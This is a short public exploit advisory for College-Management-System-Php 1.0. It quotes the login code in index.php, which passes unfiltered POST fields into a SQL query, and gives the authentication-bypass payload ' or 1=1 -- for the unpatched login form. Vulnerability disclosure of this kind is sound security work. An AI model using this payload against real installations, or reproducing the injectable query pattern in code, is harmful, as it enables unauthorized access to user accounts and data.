# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection # Exploit Author: BLAY ABU SAFIAN (Inveteck Global) # Website: https://github.com/olotieno/College-Management-System-Php # Date: 2020-06-16 # Google Dork: N/A # Vendor: https://github.com/olotieno/ # Software Link: https://github.com/olotieno/College-Management-System-Php.git # Affected Version: N/A # Patched Version: unpatched # Category: Web Application # Tested on: MAC The College Management System Php suffers from sql injection vulnerabilities in the index.php page: $msg=""; if(isset($_POST['btn_log'])){ $uname=$_POST['unametxt']; $pwd=$_POST['pwdtxt']; $sql=mysqli_query($con,"SELECT * FROM users_tbl WHERE username='$uname' AND password='$pwd' SQL injection vulnerability:- in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability payload: ' or 1=1 -- Thank you regards Abu Safian Blay https://inveteckglobal.com